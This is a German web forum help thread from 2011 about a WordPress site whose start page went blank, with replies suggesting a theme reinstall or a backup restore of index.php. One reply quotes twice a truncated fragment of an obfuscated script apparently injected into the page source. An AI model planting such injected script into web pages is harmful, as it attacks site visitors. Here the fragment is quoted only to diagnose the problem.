brauche dringend hilfe

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Strato wird da nichts gemacht haben. Da die Kontaktseite geht wird ich mir mal das System anschauen.

Der Quelltext deiner Stratseite sieht sehr komisch aus...

<script>d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=nul

• Strato wird da nichts gemacht haben. Da die Kontaktseite geht wird ich mir mal das System anschauen.

Der Quelltext deiner Stratseite sieht sehr komisch aus...

<script>d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=nul

wo finde ich die startseite in wordpress und warum soll die plötzlich leer sein
    :shock:

• das ist die index

Einmal editiert, zuletzt von jottlieb (7. Juli 2011 um 10:40)

• Na du hast doch ein Theme gewählt.

-> Design -> Themen verwalten

sort ist unter aktuelles Thema dein benutztes Thema aufgeführt.

Wenn du an diesem keine änderungen vorgenommen hast kannst du dieses eigentlich löschen und neu installieren, dann müsste alles wieder OK sein. solltest du Änderungen vorgenommen haben, dann eben ein Backup der index.php einspielen.

Zur Not kannst du auch deinen Provider fragen, ob er ein Backup einspielen kann, was vor der Änderung angefertigt wurde.

• abele:
    Bitte das nächste mal Forenregeln beachten:
    - Aussagekräftigen Threadtitel wählen
    - Code als solchen kennzeichnen

"Eine gut gestellte Frage ist schon halb beantwortet."

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!